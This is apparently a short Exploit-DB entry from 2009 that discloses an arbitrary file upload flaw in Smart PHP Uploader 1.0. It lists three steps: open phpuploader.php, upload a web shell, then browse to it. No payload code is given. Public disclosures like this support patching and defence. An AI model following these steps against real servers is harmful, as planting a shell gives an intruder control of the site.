Smart PHP Uploader 1.0 - Arbitrary File Upload

EDB-ID:

10727

CVE:

N/A


Author:

Phenom

Type:

webapps


Platform:

PHP

Date:

2009-12-27


 #######################################################################
 #                                                                     #
 ###     Smart PHP Uploader 1.0 Remote File Upload Vulnerability     ###
 #                                                                     #
 #######################################################################
 #                                                                     #
 #  Author : Phenom                                                    #
 #                                                                     #
 #  vendor : http://www.scriptsez.net                                  #
 #                                                                     #
 #  language : PHP                                                     #
 #                                                                     #
 #  Version : 1.0                                                      #
 #                                                                     #
 #######################################################################
 #                                                                     #
 # Exploit :                                                           #
 #                                                                     #
 # 1- http://server/path/phpuploader.php                               #
 #                                                                     #
 # 2- upload your shell                                                #
 #                                                                     #
 # 3- http://server/path/yourshell.php                                 #
 #                                                                     #
 #######################################################################